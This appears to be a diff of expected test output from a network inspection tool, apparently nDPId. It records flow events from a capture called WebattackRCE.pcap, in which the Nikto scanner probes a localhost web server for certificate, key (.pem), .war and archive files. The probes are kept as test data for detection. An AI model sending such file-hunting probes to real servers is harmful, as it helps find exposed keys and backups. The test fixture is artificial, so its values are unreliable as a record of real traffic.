 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
